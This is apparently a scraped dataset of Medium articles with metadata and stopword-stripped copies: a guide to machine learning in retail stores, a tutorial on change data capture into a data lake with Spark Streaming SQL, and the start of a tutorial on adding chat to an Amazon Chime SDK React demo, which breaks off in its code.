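X_train, X_test, y_train, y_test = train_test_split(X, units_sold, random_state=0)

model = GradientBoostingRegressor(random_state=0)
model.fit(X_train, y_train)
pred = model.predict(X_test)
print("MAE (units per week):", round(mean_absolute_error(y_test, pred), 2))
```

The mean absolute error per store-product-week is the kind of number a category manager can translate directly into safety stock and, ultimately, into dead inventory avoided.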
Low prices and an extensive catalog are no longer enough for customers, who can find such a value proposition online. An authentic brand experience becomes key to survival: the store is a storehouse of engaging experiences, ideas and interactions. The use cases are of course numerous (even if they often border on the sci-fi technobabble side of the AI equator): during 2019’s NRF, Google presented a connected mirror which links visual recognition data and the store’s product database. In the case of an optical store, for example, the mirror can recognize the model being tried on and display product or marketing information concerning it. The sellers also have statistics on the use of the mirror in real time: they know that the person who has tried a certain type of glasses has been there for some time or hesitates between two pairs. This facilitates the work of the seller, who can thus advise the customer on the products which really interest them. H&M has for its part allied itself with Microsoft to test a mirror that lets customers take selfies using voice commands, while Lululemon’s mirror acts more like a board which encourages its customers to engage with the community created and maintained by the brand. Smart mirrors can of course be placed at different stages of the purchasing process: Ralph Lauren’s is located in the fitting room to transform the often frustrating experience of trying out clothes. Buyers can interact with the mirror to change the lighting in their fitting room and can select different sizes or colors for their outfits, which an employee will then bring over. The mirror also recommends other items that would go well with what is being tried on. Cosmetic companies have also adopted these solutions: the Sephora smart mirror uses an intelligent algorithm which mixes the gender, age, appearance and style of the person looking at it in order to make recommendations. It even claims to differentiate between people wearing neutral or bright colors, daring or conservative styles and clothes with floral and geometric patterns, to name a few. Through deep learning, we are also seeing a new technique emerge: affective computing. It is the ability of computers to recognize, interpret, and possibly simulate emotions. It is indeed possible to identify gestures such as head and body movements, while a voice’s tone can also speak volumes about an individual’s emotional state. These insights can be used in the store so as not to inconvenience a customer who clearly does not want to be helped or bothered. These technologies are nevertheless new (only Releyeble offers retail use cases) and intrusive: it is therefore preferable not to comment yet on future use cases.
4. Making the shopping experience smoother for the customer
Mirrors, augmented reality, virtual reality… they rarely address the real pain points of retailers and their customers. And we know these pain points by heart: checkout length, quick product localization and inventory management… those should be priorities for stores looking for ways to use machine learning and deep learning solutions.
Reducing friction at checkout
In China, for example, customers of certain KFCs can, thanks to Alipay technology, make a purchase by placing themselves in front of a POS equipped with cameras, after having linked an image of their face to a digital payment system or bank account.
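For illustration, the matching step behind such "pay with your face" schemes can be reduced to comparing a freshly captured face embedding with the embeddings stored at enrolment. The sketch below assumes those embeddings already exist (produced by some face-recognition model not shown here); the account names, similarity threshold and 128-dimensional random vectors are all made up, and real payment systems layer liveness checks and consent on top.

```python
import numpy as np

def best_match(query_embedding, enrolled, threshold=0.6):
    """Return the enrolled account whose face embedding is closest to the query.

    enrolled: dict mapping account_id -> embedding vector produced at sign-up.
    Uses cosine similarity; rejects the match if similarity falls below the
    threshold so unknown faces are not charged to someone else's account.
    """
    q = query_embedding / np.linalg.norm(query_embedding)
    best_id, best_score = None, -1.0
    for account_id, emb in enrolled.items():
        score = float(q @ (emb / np.linalg.norm(emb)))
        if score > best_score:
            best_id, best_score = account_id, score
    return (best_id, best_score) if best_score >= threshold else (None, best_score)

# Illustrative use with random 128-dimensional "embeddings".
rng = np.random.default_rng(1)
accounts = {f"user_{i}": rng.normal(size=128) for i in range(100)}
probe = accounts["user_7"] + rng.normal(scale=0.1, size=128)  # noisy re-capture
print(best_match(probe, accounts))
```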
The American chain Caliburger has also tested the idea of facial recognition in some of its restaurants: the first time customers order using in-store kiosks, they are invited to link their faces to their account using NEC’s NeoFace facial recognition software in order to benefit from numerous advantages. Payment by bank card is still necessary, but the company intends to switch to payment by facial recognition if the initial test phase is successful. Fears over cybersecurity could however prevent this kind of solution from seeing the light of day on a large scale. Indeed, customers are more and more protective of their personal data (and rightly so): according to a Wavestone study, only 11% of consumers are ready to submit to facial recognition in stores. For recognition by mobile application, this figure rises to 40%. Other, more viable, ways to use computer vision to make checkout more fluid are therefore being considered. We are by now all familiar with Amazon Go’s automated stores (not too familiar, one hopes), which allow customers with a Prime account to enter the store with a code on their phones, do their shopping, and exit the store without going through a checkout. An algorithm having “followed” the customer around, the amount of the purchases is automatically debited, and an invoice is sent by email. Testing of this technology is also underway at Casino, in partnership with XXII. There are many start-ups in this space: Standard Cognition, Zippin, Trigo Vision… all claim to help companies eliminate the checkout process for their customers. China, meanwhile, is casually reworking the very concept of the store through the Bingo-Box by Auchan.
Reducing stock-outs
All these cameras can be used to see more than customers: many solutions for monitoring shelves have indeed emerged. They send an alert to employees in the event of a shortage, which allows for a prompt response. This is key for stores: stock-outs represent more than $129 billion in lost sales in North America each year (~4% of revenues). Not only that, but stock-outs can also actively drive customers into the arms of the competition: 24% of Amazon’s revenue comes from customers who have experienced a stock-out at a local retailer. There are many examples of such solutions: in France, Angus AI works with Les Mousquetaires. In the US, Walmart has been working on this concept since last year, as has ABInbev with Focal Systems. Interestingly, Yoobic’s solution offers a similar process, but the camera is in the hands of individuals, who take the photos that will be analyzed by the algorithms. In China, meanwhile, Hema (Alibaba’s store of the future) is pushing the boundaries of the augmented store further than anywhere else in the world.
Shopping advice through voice technology
Of course, images aren’t the only things that can be analyzed in store; voice also has a role to play in streamlining customer journeys. This under-appreciated method of shopping is due for a small revolution: 13% of all households in the United States owned a smart speaker in 2017, per OC&C Strategy Consultants. That number is predicted to rise to 55% by 2022. The fact that Amazon is also a leader in voice technologies shows how serious the Seattle giant is about brick-and-mortar domination (having already conquered virtual spaces). The brand’s Echo Buds, launched in 2019, work with Alexa to answer any questions it understands while a customer is on the move. 
More interestingly for retail, it also informs the user if the closest Whole Foods (Amazon owns Whole Foods) has an item a customer is looking for. Once they are informed and in the store, the Echo Buds can direct them to the right aisle. You can imagine Alexa not only guiding you to an item, but, if you tell it that you want to make lasagna, also guiding you through the store, giving you the quickest way to pick up all the necessary ingredients. The future is ear (get it?). Virtual assistants are indeed on the rise. The Mars Agency, for example, has partnered with American retailer BevMo! to test SmartAisle, a digital whiskey purchase assistant. By mixing artificial intelligence, voice-activated technology and LED lights on the shelves, SmartAisle helps buyers choose the perfect whiskey bottle. Three bottles are recommended after a quick conversation, and the relevant shelves light up to lead the customer to the preferred bottles. If customers already have a brand in mind, the assistant can recommend other brands or bottles with similar flavor profiles. The whole experience lasts no more than 2 minutes. The voice assistant makes it a pleasant and informative experience, with a mix of banter and useful information. From NLP to virtual assistants, the two examples above show that, if used well, voice technology can free up more employee time, and give key data to retailers.
Robotic automation
The discussion on improving and streamlining processes would not be complete without a discussion around robotics. These objects, long relegated to science fiction, are now showing their usefulness in stores around the world. Although robotics is not in itself a subcategory of artificial intelligence, robots roaming the aisles use notions of computer vision and NLP. Just like Amazon, Walmart is, here too, at the cutting edge of technology: Bossa Nova robots (called “Auto-S”), which are designed to scan items on the shelves to help with price accuracy and restocking, are already present in 1,000 of their stores. These six-foot-tall devices contain 15 cameras each, which scan shelves and send alerts to employees in real time. This frees workers from the need to focus on repeatable, predictable and manual tasks, giving them time to focus more on sales and customer service. Walmart has also introduced robots that clean floors, unload and sort items from trucks and pick up orders in stores. It is interesting to note that this niche is quickly becoming highly competitive: Simbe’s robots have been deployed in Schnucks stores across America, with the same value proposition as Bossa Nova, while Lowe’s unveiled in 2016 a robot that can understand and respond to simple customer questions. Post-coronavirus, it is almost certain that the movement towards robotics will accelerate in the coming months.
5. Loss prevention
“Shrinkage” (theft) has an enormous cost: €49 billion per year on a European scale (2.1% of annual turnover in the distribution sector), weighing heavily on the margins of distributors already highly pressurized by price wars. Security therefore becomes a pressing need. And because of costs, so does automation. This can take many forms. Augmented cameras, for example, can identify if a product has been hidden, and alert a human. This would, however, produce a lot of false positives due to the physical impossibility of an all-knowing camera. Companies such as Vaak or DeepCam AI claim to be able to avoid this problem by alerting someone only if the behavior of a visitor is highly suspicious. 
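How these vendors score "suspicious" behaviour is proprietary, but the general idea can be sketched as anomaly detection over per-visit features. The example below uses scikit-learn's IsolationForest on entirely made-up features (time in store, items picked up, items put back, time out of camera view); it is a generic illustration, not a description of Vaak's or DeepCam AI's systems, and any flag it raises should only ever trigger a human review.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Hypothetical per-visit features derived from in-store tracking.
# Real systems would use far richer signals than these four columns.
rng = np.random.default_rng(3)
normal_visits = np.column_stack([
    rng.normal(15, 5, 2_000),    # minutes spent in store
    rng.poisson(6, 2_000),       # items picked up
    rng.poisson(1, 2_000),       # items put back on the shelf
    rng.normal(0.5, 0.3, 2_000)  # minutes out of camera view
])

# Fit on ordinary visits; contamination is the assumed share of anomalies.
detector = IsolationForest(contamination=0.01, random_state=0)
detector.fit(normal_visits)

# Score a new visit; -1 means "unusual enough to flag for a human to review".
new_visit = np.array([[45.0, 14, 12, 6.0]])  # long visit, many items put back
print(detector.predict(new_visit))           # e.g. [-1]
```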
Solutions such as StopLift also offer to detect “sweethearting” (an employee pretending to make a transaction, but in fact giving a product to an acquaintance without payment). It is important to remember that a large percentage of store thefts involve employees. The ROI of these solutions is easy to calculate: stores know exactly how much they lose from theft and errors. As such, this use case is likely to be one of the first to be implemented.
Conclusion
In view of all these developments, and despite their many positives for both retailers and customers, it is essential that customers question retailers about who has access to data and how it is used. It goes without saying that transparency must be the watchword of any use of personal data in order to guarantee consumers the preservation of their private life. If you’re eager to get going with your very own corporate A.I. project, I recommend jumping straight to my latest article on the matter: 10 Steps to your very own Corporate Artificial Intelligence project.
https://towardsdatascience.com/complete-guide-to-machine-learning-and-deep-learning-in-retail-ca4e05639806
['Adrien Book']
2020-05-15 16:41:57.390000+00:00
['Retail Technology', 'AI', 'Retail', 'Artificial Intelligence', 'Deep Learning']
Title Complete guide machine learning deep learning retailContent Complete guide machine learning deep learning retail store aren’t dead yet Stores changing see happening eye even don’t always realize Little little becoming one extra step increasingly complex customer journey Thanks digitalisation retail automation store longer end mean serving need brand large quality experience feeling belonging recognition comfort purchase… parameter matter much sale per square meter must therefore submit optimization prescribed Data Science “intelligent algorithms” aka artificial Intelligence form machine learning deep learning use artificial intelligence competitive necessity Indeed ecommerce player wait anyone note example adaptation online search result end customer recommendation made based digital profile two aspect impossible brick mortar However physical commerce strength Olfactory visual auditory etc data used give consumer feeling experienced something unique made specifically addition customer relationship improvement artificial intelligence also make possible seek resolution problem long represented burden retailer better inventory management optimization store space optimization employee time… present complete look deep learning machine learning use case implemented create store future supported reallife example 1 Adapting store inventory better serve customer It’s known fact ecommerce actor optimize website real time using dynamic statistic allows define effective strategy according resource available predefined customer segmentation Like physical space store luxury However prevent periodic optimization physical space thanks insight gleaned intelligent algorithm Back day le 20 year ago we’d hire student follow count customer specific area store Thankfully time Heatmaps average route diagram time spent screen various ratio relation total attendance correlations… camera store computer vision algorithm provide actionable tool based image Today heatmapping activity recognition solution help position promotion also create entire marketing strategy measure performance department well product placement Solutions offered like RetailFlux analyze store video give retailer data number people store path take inside linger help marketer identify popular location allowing change layout furnishing display advertising staff better serve customer increase revenue technology evolve also starting hear “demographic recognition” tool created startup DeepVision AI MyStoree RetailDeep RetailNext allow u estimate age gender people passing front camera thus giving store access whole new granularity analyzes aspect paramount rationalisation expected marketer category manager Although camera often hung ceiling always case Walgreens partnership Cooler Screens example recently integrated camera sensor digital screen door stores’ cooler create network “smart” display brand use target ad specific type customer door act digital merchandising platform depicts food beverage best light also instore billboard show ad consumer approaching based variable approximate age gender current weather Cameras sensor inside connected cooler also determine item buyer picked viewed giving advertiser insight promotion work screen quickly notifying retailer product longer stock key question thus shift “where” “how many” “who” “when” “how often” “how long” “for many cookies” 2 Forecasting increase profit data mixed checkout loyalty program key forecasting demand creating store cluster turn improves retailers’ supply chain better predicting 
product well certain area machine learning algorithm startup Symphony RetailAI reduce dead stock help optimise pricing profit increase customer loyalty people obviously tend enjoy finding right product mix nearest store Indeed unsold stock might one retail industry’s biggest handicap unused inventory cost US retailer 50 billion year Reducing number key industry’s longterm survival every dollar spent becomes dead inventory valuable money could put towards training talent better RD obviously brand new smart algorithm Forecasting also help retailer optimisise promotion le dead stock warehouse strategic promotion instead merely reactionary Many pricing aficionado particularly appreciate aspect make job lot easier lot le thankless 3 Personnalisation promote instore experience way website adapt real time end user increased granularity computer vision also possible store allowing target individual However algorithm based element one presented thus complexless reliable work personal level algorithm need mix demographic recognition loyalty code identification augmented reality often integrated smart object mirror Although cannot yet implemented large scale solution exemplify profound change way store sell moving sale product sale experience physical offer becomes byproduct concept shoppertainment Low price extensive catalog longer enough customer find value proposition online authentic brand experience becomes key survival store storehouse engaging experience idea interaction use case course numerous even often border scifi technobabble side AI equator 2019’s NRF Google presented connected mirror link visual recognition data store product database case optical store example mirror recognize model tested display product marketing information concerning seller also statistic use mirror real time know person tried certain type glass time hesitates two pair facilitates work seller thus advise customer product really interest HM part allied Microsoft test mirror allowing take selfies thanks voice command Lululemon’s mirror act like board encourages customer engage community created maintained brand Smart mirror course placed different interval purchasing process Ralph Lauren’s located fitting room transform often frustrating experience trying clothes Buyers interact mirror change lighting fitting room select different size color outfit employee get mirror also recommends item would go well tried Cosmetic company also adopted solution Sephora smart mirror us intelligent algorithm mix gender age appearance style person looking order make recommendation even claim differentiate people wearing neutral bright color daring conservative style clothes floral geometric pattern name deep learning also seeing new technique emerge affective computing ability computer recognize interpret possibly stimulate emotion indeed possible identify gesture head body movement voice’s tone also speak volume individual’s emotional state insight used store generate inconvenience customer clearly need helped bothered technology nevertheless new Releyeble offer retail use case intrusive therefore preferable comment yet future use case 4 Making shopping experience smoother customer Mirrors augmented reality virtual reality … rarely respond real pain point retailer customer know pain point heart checkout length quick product localization inventory management… priority store looking way use machine learning deep learning solution Reducing friction checkout China example customer certain KFCs thanks Alipay technology make purchase 
placing front POS equipped camera linked image face digital payment system bank account American chain Caliburger also tested idea ​​facial recognition restaurant first time customer order using instores kiosk invited link face account using NEC’s NeoFace’s facial recognition software order benefit numerous advantage Payment bank card still necessary company intends switch payment facial recognition initial test phase successful Fears cybersecurity could however prevent kind solution seeing light day large scale Indeed customer jealous personal data rightly according Wavestone study 11 consumer ready submit facial recognition store recognition mobile application figure rise 40 viable way use computer vision make checkout fluid therefore considered familiar Amazon Go’s automated store familiar one hope allow customer Prime account enter store code phone shopping exit store without going checkout algorithm “followed” customer around amount purchase automatically debited invoice sent email Testing technology also underway Casino partnership XXII many startup space Standard Cognition Zippin Trigo Vision… claim help company eliminate checkout customer China meanwhile casually reworking concept store BingoBox Auchan Reducing stockouts camera used see customer many solution monitoring shelf indeed emerged offer send alert employee event shortage allows prompt response key store stockouts represent 129 billion lost sale North America year 4 revenue stockouts also actively drive customer arm competition 24 Amazon’s revenue come customer experienced stockout local retailer many example solution France Angus AI work Les Mousquetaires US Walmart working concept since last year ABInbev Focal Systems Interestingly Yoobic’s solution offer similar process camera hand individual order take photo analyzed algorithm China meanwhile Hema Alibaba’s store future pushing border augmented store anywhere else world Shopping advice Voice technology course image aren’t thing analyzed store voice also role play streamlining customer journey underappreciated method shopping due small revolution 13 household United States owned smart speaker 2017 per OCC Strategy Consultants number predicted rise 55 2022 fact Amazon also leader voice technology show serious Seattle giant term brickandmortar domination already conquered virtual space brand’s Echo Buds launched 2019 work Alexa answer question understands customer move interestingly retail also informs user closest Whole Foods Amazon owns Whole Foods item customer looking informed store Echo Buds direct right aisle imagine Alexa guiding item tell want make lasagna could also guide store giving quickest way pick necessary ingredient future ear get Virtual assistant indeed rise Mars Agency example partnered American retailer BevMo test SmartAisle digital whiskey purchase assistant mixing artificial intelligence voiceactivated technology LED light shelf SmartAisle help buyer choose perfect whiskey bottle Three bottle recommended quick conversation relevant shelf light lead customer preferred bottle customer already brand mind assistant recommend brand bottle similar flavor profile whole experience last 2 minute voice assistant make pleasant informative experience mix banter useful information NLP virtual assistant two example show used well Voice technology free employee time give key data retailer Robotic automation discussion improving streamlining process would complete without discussion around robotics object long relegated science fiction showing usefulness store 
around world Although robotics subcategory artificial intelligence robot roaming aisle use notion computer vision NLP like Amazon Walmart cutting edge technology Bossa Nova robot called “AutoS” designed scan item shelf help price accuracy restocking already present 1000 store six foot tall device contain 15 camera scan shelf send alert employee real time free worker need focus repeatable predictable manual task giving time focus sale customer service Walmart also introduced robot clean floor unload sort item truck pick order store interesting note niche quickly becoming highly competitive Simbe’s robot deployed Schnuck store across America value proposition Bossa Nova Lowe’s unveiled 2016 robot understand respond simple customer question Postcoronavirus almost certain movement towards robotics accelerate coming month 5 Loss prevention “Shrinkage” theft enormous cost €49 billion per year European scale 21 annual turnover distribution sector weighing heavy margin distributor already highly pressurized price war Security therefore becomes pressing need cost automation take many form Augmented camera example identify product hidden alert human would however produce lot false positive due physical impossibility allknowing camera Companies Vaak DeepCam AI claim able avoid problem alerting someone behavior visitor highly suspicious Solutions StopLift also offer detect “sweethearting” employee pretending make transaction fact giving product acquaintance without payment important remember large percentage store theft go employee ROI solution easy calculate store know exactly much lose theft error use case likely one first implemented Conclusion view development despite many positive retailer customer essential customer question retailer access data used go without saying transparency must watchword use personal data order guarantee consumer preservation private life you’re eager get going corporate AI project recommend jumping straight latest article matter 10 Steps Corporate Artificial Intelligence projectTags Retail Technology AI Retail Artificial Intelligence Deep Learning
3,888
Orchestrating change data capture to a data lake
Orchestrating change data capture to a data lake Building change data capture (CDC) with Spark Streaming SQL What is change data capture? If you are a data engineer, CDC will not appear foreign to you. It is an approach to data integration based on identifying, capturing, and delivering changes made to the source data. CDC can help load source tables into your data lake. A huge amount of data is stored in the application database, and the data team wants to analyze those tables; running queries against the live production database, however, could degrade performance for the application itself. A CDC process/pipeline is therefore used to load the tables into an external data lake, and the apps that need access can run ETL or ad-hoc queries on the target tables stored in the data lake for analysis. Possible architectural considerations There are a lot of CDC solutions, including incremental scheduled import jobs and real-time jobs. Sqoop is an open source tool that can be used to transport data between Hadoop and relational databases. The team can build daily Sqoop jobs to load the data into the data lake. This still creates a heavy load on the database and affects performance, so the schedule needs to be worked out to make sure application performance is not affected. This scenario severely limits real-time queries and analysis, on top of the other limitations Sqoop has. The problem with the previous architecture is the load and bottleneck it creates on the application database. To solve those issues we can use the binlog. The binlog is a set of sequential log files that record insert, update, and delete operations. For a streaming CDC pipeline built on the binlog, we first use an open source tool such as Maxwell or Debezium to sync the binlog to Kafka or a comparable message queue. Downstream apps can then leverage Spark Streaming to consume the topic from Kafka in sequence, parse the binlog records, and write them into a target storage system that supports insert, update, and delete, such as Kudu or HBase. This solution comes with a set of operational challenges when the data volume is large, especially with Kudu. Based on our previous architectural considerations, the binlog limits the load on the application database, but it introduces a few other challenges. We can solve those operational challenges using Spark Streaming SQL: we build the CDC process/pipeline with Streaming SQL, which parses the binlog records and merges them into the data lake. Orchestration for Spark Streaming SQL SQL is a declarative language, and almost all data engineers have SQL skills, especially with databases and data warehouses such as MySQL, HiveQL, or Spark SQL. The advantage of using Streaming SQL is that even developers who are not familiar with Spark Streaming, Java, or Scala can easily develop stream processing. It is also low cost to migrate from a batch SQL job to a Streaming SQL job. As part of this orchestration, we should already have synced the binlog of the table to Kafka using Debezium or a similar product. The binlog has its own format, so the binlog parser is different from a normal parser. We use Spark Streaming SQL to consume the binlog from Kafka, parse each record according to its operation type (insert, update, or delete), and then merge the parsed records into the data lake. 
Internally, Spark Streaming receives live input data streams and divides the data into batches, which are then processed by the Spark engine to generate the final stream of results in batches. Step one, we create two tables: a source table over the Kafka topic and a target table in the data lake. Step two, we create a streaming scan on top of the Kafka table and set some parameters in the options clause, such as the starting offsets and the max offsets per trigger. Step three houses the major logic of the CDC pipeline: we write the MERGE INTO statement together with the job parameters for the streaming query. Step four, we use the Streaming SQL command to launch the SQL file; this launches a client-mode streaming job. Once that is set up and the job runs, we can view the CDC streaming pipeline. At this point we can check the target table in the data lake by querying it: if there are data changes in the source database table, the two should match. For each batch of the stream, the merge function is called to merge the parsed binlog records into the target table. That finishes the orchestration. After this setup, we need monitoring and metrics on each step of the process. These metrics give us the values to visualize bottlenecks and the flow of data. In addition, we need alerts on the operational metrics, so the team can consume them and respond to issues as they arise. Conclusion The process above provides a way to set up a basic CDC pipeline that can handle billions of CDC events relatively well, including update and delete operations on the data lake table. On top of this solution, the team can support schema enforcement and evolution, which provide better data quality and data management. Time travel provides snapshots of the data, so we can query any earlier version of the data. Spark can write to the target table in both batch mode and streaming mode, and an engine such as Presto can be used to query the same data. 
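To make the four steps concrete, here is a minimal sketch of the same pipeline written with the PySpark Structured Streaming API rather than the Streaming SQL files described above. It assumes a Maxwell/Debezium-style JSON payload on Kafka and a Delta Lake target table; the topic, table, and column names (mysql.binlog, lake.orders, op, id) are placeholders, not the article's actual job.

# Hypothetical sketch: stream binlog records from Kafka and merge them into a
# Delta Lake table with PySpark Structured Streaming. Names are placeholders.
from delta.tables import DeltaTable
from pyspark.sql import SparkSession, functions as F
from pyspark.sql.types import StringType, StructField, StructType

spark = SparkSession.builder.appName("cdc-demo").getOrCreate()

# Assumed shape of the parsed binlog payload (Maxwell/Debezium-style JSON).
binlog_schema = StructType([
    StructField("op", StringType()),       # "insert" | "update" | "delete"
    StructField("id", StringType()),       # primary key of the source row
    StructField("payload", StringType()),  # the row data as a JSON string
])

# Steps one and two: a streaming scan over the Kafka topic carrying the binlog.
raw = (spark.readStream
       .format("kafka")
       .option("kafka.bootstrap.servers", "broker:9092")
       .option("subscribe", "mysql.binlog")
       .option("startingOffsets", "latest")
       .option("maxOffsetsPerTrigger", 10000)
       .load())

parsed = (raw
          .select(F.from_json(F.col("value").cast("string"), binlog_schema).alias("r"))
          .select("r.*"))

# Step three: for each micro-batch, merge the parsed records into the target table.
# (A real job would first deduplicate to the latest record per id within the batch.)
def merge_batch(batch_df, batch_id):
    target = DeltaTable.forName(spark, "lake.orders")
    (target.alias("t")
     .merge(batch_df.alias("s"), "t.id = s.id")
     .whenMatchedDelete(condition="s.op = 'delete'")
     .whenMatchedUpdateAll(condition="s.op = 'update'")
     .whenNotMatchedInsertAll(condition="s.op != 'delete'")
     .execute())

# Step four: launch the streaming job.
(parsed.writeStream
 .foreachBatch(merge_batch)
 .option("checkpointLocation", "/tmp/checkpoints/cdc-demo")
 .start())

The foreachBatch callback plays the role of the MERGE INTO statement: each micro-batch of parsed binlog records is applied to the target table as inserts, updates, or deletes.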
https://medium.com/acing-ai/orchestrating-change-data-capture-to-a-data-lake-283048656d98
['Vimarsh Karbhari']
2020-09-10 14:45:42.720000+00:00
['Machine Learning', 'Data Science', 'Artificial Intelligence', 'Data Engineering', 'Spark']
Title Orchestrating change data capture data lakeContent Orchestrating change data capture data lake Building change data captureCDC Spark Streaming SQL change data capture data engineer CDC appear foreign approach data integration based checking capture delivery change data source interface CDC help loading source table data lake huge amount data stored database application source data team would want analyze table Running query live production database could result degradation performance external application CDC processpipeline used load table external data lake apps need access use ETL adhoc target table stored data lake analysis Possible architectural consideration lot CDC solution including incremental scheduled import job real time job Sqoop open source tool could used transport data Hadoop relational database team build daily job could used load data data lake could still create huge load database affect performance Hence schedule need worked make sure application performance affected scenario could severely limit real time query analysis top limitation Sqoop additionally problem previous architecture load bottleneck creates application database solve issue use binlog binlog set sequence log file could record insert update delete operation streaming CDC pipeline using binlog first use source u like JSON Maxwell sync binlog Kafka comparable service apps downstream leverage Spark streaming consume topic Kafka sequencing Sequencing par binlog record targeted storage system could support Insert Update Delete like Kudu data HBase solution come set operational challenge data large especially Kudu Based previous architectural consideration binlog limit load application database result challenge solve operational challenge issue using Spark Streaming SQL could build CDC processpipeline using Spark Streaming SQL drive Streaming SQL parse binlog merge data lake Orchestration Spark Streaming SQL SQL declarative language Almost data engineer SQL skill especially database data warehouse like MySQL HIVESQL SparkSQL advantage using Stream SQL even developer familiar Spark Streaming Java Scala still easily develop streaming processing Additionally also low cost want migrate best SQL job Streaming SQL job part orchestration sync binlog table Kafka using Debezium similar product Binlog different format hence binlog parser also different normal parser use Spark Streaming SQL consume binlog Kafka parse binlog using operation type record like insert update delete merge past record data data lake Internally Spark Streaming receives live input data stream divide data batch processed Spark engine generate final stream result batch Step one create two table one source Kafka table another target data table Step two create streaming scan top Kafka table set parameter option clause like studying offset max offset per trigger Step three would house major logic CDC pipeline create screen wrap merge statement job parameter Step four use Streaming SQL command launch SQL file command launch client mode streaming job set job run view CDC streaming pipeline point check query data table outer link data change source database table match batch streaming call data’s merge function merge parse binlog record target data table finish orchestration Post setup need setup monitoring metric step process metric provide u value visualize bottleneck flow data addition need setup alert operational metric would allow team consume respond alert respectively Conclusion process able provide way setup basic CDC pipeline handle billion 
CDC event relatively well also update delete mode ratio data table top solution team could support schema enforcement evolution provide better data quality data management Time travel provides snapshot data query earlier worsening data Spark write data data including batch mode streaming mode leverage Presto spark query data dataTags Machine Learning Data Science Artificial Intelligence Data Engineering Spark
3,889
Add Chat Feature to Demo of Amazon Chime SDK React Component Library
Add Chat Feature to Demo of Amazon Chime SDK React Component Library dannadori Follow Nov 30 · 7 min read Note: This article is also available here.(Japanese) https://cloud.flect.co.jp/entry/2020/11/30/125920 In our last article, we posted a brief introduction to the Amazon Chime SDK React Component Library. At the time of writing, the latest update of this library, ver 1.5.0, added Chat-related components. I’m going to use it to add Chat functionality to an official AWS demo. Like this. Note: that this article is a bit complicated, using React coding. If you simply want to run the code, the URL of the repository is given at the end of this article, so you can get the code from there and run it. At First This time, we will add Chat functionality based on the demo provided by the official. First, make sure you have a working sample of ver 1.5.0, referring to the previous article. Approach Generally, the Amazon Chime SDK React Component Library provides React components as well as hooks and providers (Context APIs) that work behind the components to make it easier to use Amazon Chime’s features. With the addition of the Chat-related components, I was hoping that they would provide providers or hooks to enable Chat functionality, but unfortunately, they haven’t yet. This issue says that you should implement it yourself with data messages for real-time signaling. Please refer to my previous article on data messages for real-time signaling. So, I would like to implement a provider that uses data messages for real-time signaling by myself. RealitimeSubscribeChatStateProvider We will name the provider we will create as RealtimeSubscribeChatStateProvider. The following is a brief description of the content of the provider, in excerpts that we think are important. The entire source code can be found here. Call userealitimeSubscribeChatState() of this provider so that you can refer to the Chat features and data. Definition of State Define the State (Chat function and data) provided by userealitimeSubscribeChatState(). If you just want to create a simple Chat function, the following two variables should be sufficient. export interface RealitimeSubscribeChatStateValue { chatData: RealtimeData[] sendChatData: (mess: string) => void } The RealtimeData used in the interface is the actual data to be sent and received. In this article, we have defined the following data structure. export type RealtimeData = { uuid: string data: any createdDate: number senderName: string //<snip> } useRealitimeSubscribeChatState() The method to provide the above State is as follows: when creating a provider using the Context API, I think it’s almost formulaic, so I won’t describe it. export const useRealitimeSubscribeChatState = (): RealitimeSubscribeChatStateValue => { const state = useContext(RealitimeSubscribeChatStateContext) if (!state) { // handle exception } return state } Definition of Provider Sending and receiving data messages for real-time signaling is done by AudioVideoFacade. You can get a reference to this AudioVideoFacade with useAudioVideo() (1–1), and you can get the username with useAppState() (1–2). The user name can be retrieved with useAppState() (1–2). The Chat text data is managed by this provider using useState. (1–3) In (2–1), we define a data transmission function using data messages for real-time signaling. We call the method of audioVideo (AudioVideoFacade) to send the data. In this time, we specify “CHAT” because we can specify the topic (2–2). 
Also, since the sender can’t receive the sent data , you should add the sent data to the Chat text data after sending(2–3). useEffect registers (and deletes) a function for receiving data messages for real-time signaling (3–1), (3–2). The receive function itself just parses the received data and adds it to the text data of Chat, as shown in (3–3). export const RealitimeSubscribeChatStateProvider = ({ children }: Props) => { const audioVideo = useAudioVideo() // <----- (1-1) const { localUserName } = useAppState() // <----- (1-2) const [chatData, setChatData] = useState([] as RealtimeData[]) // <----- (1-3) const sendChatData = (text: string) => { // <----- (2-1) const mess: RealtimeData = { uuid: v4(), data: text, createdDate: new Date().getTime(), senderName: localUserName } audioVideo!.realtimeSendDataMessage("CHAT" as DataMessageType, JSON.stringify(mess)) // <----- (2-2) setChatData([...chatData, mess]) // <----- (2-3) } const receiveChatData = (mess: DataMessage) => { // <----- (3-3) const data = JSON.parse(mess.text()) as RealtimeData setChatData([...chatData, data]) } useEffect(() => { audioVideo!.realtimeSubscribeToReceiveDataMessage( // <----- (3-1) "CHAT" as DataMessageType, receiveChatData ) return () => { audioVideo!.realtimeUnsubscribeFromReceiveDataMessage("CHAT" as DataMessageType) // <----- (3-2) } }) const providerValue = { chatData, sendChatData, } return ( <RealitimeSubscribeChatStateContext.Provider value={providerValue}> {children} </RealitimeSubscribeChatStateContext.Provider> ) } GUI Next, I’m going to go over the part that displays the Chat screen. Here is another excerpt of what we think is important. Adding RealitimeSubscribeStateProvider Modify the DOM of MeetingView to allow the above created providers to be used in the conference room. Add a real-timeSubscribeStateProvider to the (1) part. This will allow the Chat feature to be used in the subordinate Views. const MeetingView = () => { useMeetingEndRedirect(); const { showNavbar, showRoster, showChat } = useNavigation(); return ( <UserActivityProvider> <StyledLayout showNav={showNavbar} showRoster={showRoster || showChat}> <RealitimeSubscribeStateProvider> // <--- (1) <StyledContent> <MeetingMetrics /> <VideoTileGrid className="videos" noRemoteVideoView={<MeetingDetails />} /> <MeetingControls /> </StyledContent> <NavigationControl /> </RealitimeSubscribeStateProvider> </StyledLayout> </UserActivityProvider> ); }; ChatView In (1), we get the chat data and a reference to the data sending function using the userealitimeSubscribeChatState() we created earlier. In (2–1) and (2–2), we use the Chat component of the Amazon Chime SDK React Component Library to generate the display part (more on this later). (3) calls the send function of the chat data. const ChatView = () => { const { localUserName } = useAppState() const { closeChat } = useNavigation(); const { chatData, sendChatData } = useRealitimeSubscribeChatState() // <---- (1) const [ chatMessage, setChatMessage] = useState(''); const attendeeItems = [] for (let c of chatData) { // <---- (2-1) const senderName = c.senderName const text = c.data const time = (new Date(c.createdDate)).toLocaleTimeString('ja-JP') attendeeItems.push( <ChatBubbleContainer timestamp={time} key={time+senderName}> // <---- (2-2) <ChatBubble variant= {localUserName === senderName ? 
